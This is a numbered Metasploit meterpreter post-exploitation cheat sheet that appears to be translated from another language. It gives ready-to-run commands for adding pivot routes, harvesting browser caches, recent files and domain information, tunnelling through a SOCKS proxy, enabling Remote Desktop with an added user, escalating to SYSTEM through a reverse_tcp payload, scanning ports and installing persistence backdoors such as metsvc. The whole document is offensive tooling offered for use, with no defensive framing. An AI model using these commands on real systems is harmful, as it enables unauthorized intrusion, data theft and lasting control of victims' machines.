=====================meterpreter operations======================
0x08 autoroute: adding routes:
run autoroute -h # show help
run autoroute -s 192.168.159.0/24 # add a route to the target environment's network
run autoroute -p # list the added routes
=====================meterpreter operations======================
0x09 Information-gathering script commands:
run post/windows/gather/checkvm # check whether the host is a virtual machine
run post/linux/gather/checkvm # check whether the host is a virtual machine
run post/windows/gather/forensics/enum_drives # list partitions
run post/windows/gather/enum_applications # get installed software information
run post/windows/gather/dumplinks # get recent file operations
run post/windows/gather/enum_ie # get the IE cache
run post/windows/gather/enum_chrome # get the Chrome cache
run post/windows/gather/enum_patches # patch information
run post/windows/gather/enum_domain # find the domain controller
=====================meterpreter operations======================
0x10 MSF commands for adding a SOCKS proxy node:
use auxiliary/server/socks_proxy
set SRVHOST 192.168.238.128
set SRVPORT 6677
set username username
set password password
run
Then vi /etc/proxychains.conf # add: socks5 192.168.238.128 6677 username password
Finally, use proxychains to access targets through the SOCKS proxy
Note: another SOCKS proxy server can also be used as the proxy
Just vi /etc/proxychains4.conf
Add: socks5 <server IP address> <port> <account> <password>
proxychains4 firefox then browses through the proxy
=====================meterpreter operations======================
0x11 Commands for enabling remote RDP:
run post/windows/manage/enable_rdp # enable Remote Desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 # add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 # forward port 3389 to 6662
=====================meterpreter operations======================
0x12 Privilege escalation commands:
use exploit/windows/local/ask
set session 1
set payload windows/meterpreter/reverse_tcp
run
getsystem # obtain SYSTEM privileges
=====================meterpreter operations======================
0x13 Port scanning commands:
run post/windows/gather/arp_scanner rhosts=192.168.238.0/24
run auxiliary/scanner/portscan/tcp rhosts=192.168.3.13 ports=3389
=====================meterpreter operations======================
0x15 persistence startup-item backdoor / metsvc service commands:
use exploit/windows/local/persistence
set session 1
run
use exploit/windows/local/persistence_service
set session 1
run
Run inside meterpreter:
run metsvc